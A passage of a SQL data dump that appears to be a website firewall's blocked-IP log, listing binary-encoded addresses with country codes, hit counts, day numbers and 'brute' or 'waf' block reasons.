\0\0\0\0����~�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����','IT',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','GB',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���%GK','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���(:�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���.{*','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���1L','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���1L','FR',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���1O','FR',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���1T&','IR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���26','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���28','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�:','IR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���;,','TR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�M','GB',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�M','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�M','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�M','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�','UA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�.','RO',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���VM�','UA',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���VM�','UA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�$','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���h,5','UA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���h,5','UA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���h��','RU',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���h��','RU',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���yQ�','KZ',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���yQ�','KZ',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���yQ�','KZ',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���yQ�','KZ',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���zɁ','TR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���zɁ','TR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���zɁ','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����M','GB',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����M','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����M','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����l','AE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����m','IR',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"o','NL',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����C','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����C','US',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����w!','PL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����w!','PL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����w.','PL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����w.','PL',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'B','',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'B','',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����L','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����L','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','TR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����Iz','PL',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����U','SK',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����<','IR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����<','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18855,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',16,18863,'waf'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r#','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r#','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r�','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@sZ','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@ts','CL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���@ts','CL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u_','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u}','CL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u�','CL',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v7','CL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���@vF','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@vs','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@wP','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@wU','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w_','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w_','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w}','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','BR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','BR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','BR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�[','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"��','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"��','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���U��','ES',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','PT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','PT',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','PT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����d','UZ',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','TR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����$','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����$','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����a','SG',7,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����a','SG',17,18867,'waf'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���q','CL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ','AR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ','AR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ','AR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ','AR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���갞','BR',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Qӈ','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q֨','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\no','CA',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\"\\','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���c\"\\','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�9','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�9','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���t�','IL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���t�','IL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����/�','DE',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����/�','DE',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0�����;','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����;','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����<','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����(','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����(','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����(','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����(','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����r\n','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','US',4,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','US',7,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','US',4,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����r\r','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����F','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����F','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','RU',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���p�\n','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���zaD','KR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���zaD','KR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���z��','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����S','IR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����w�','HK',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����K�','GB',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����K�','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���$-I','HR',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���$-I','HR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���$-I','HR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���W�\'','CZ',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��œ{�','RU',1,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0��£�5','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��£�5','DE',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����E�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����`','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���X2�','PL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�S','KZ',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ú��','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ú��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��ár�','RU',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɬL','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���ɬL','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����-�','IR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���)z�','ZA',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�7','ZW',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0�����1','TN',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����%','FI',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r\n','TN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r\n','TN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��ś�','ML',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ŜJ�','ET',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���','KE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���K�','CA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���R-','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���%{<','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6x]','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ʋ','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����T�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',4,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����R','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����R','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����S','US',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����S','US',2,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0�����U','US',2,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����V','US',4,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',6,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',8,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',5,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����R','US',6,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����R','US',6,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����R','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����S','US',3,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����S','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����U','US',4,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����V','US',4,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����V','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���?%','CA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ǩg�','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ǩg�','US',4,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ǩg�','US',2,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���w','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��ȉ�','BR',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ȗ��','BR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���`J','BD',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���=��','AT',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���?�','NP',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʼO�','MY',1,18863,'waf'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʽ��','JP',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"%\'','MN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�&','HK',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���|8','HK',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��˖0v','TH',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��˫�','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��˫�','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����bc','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���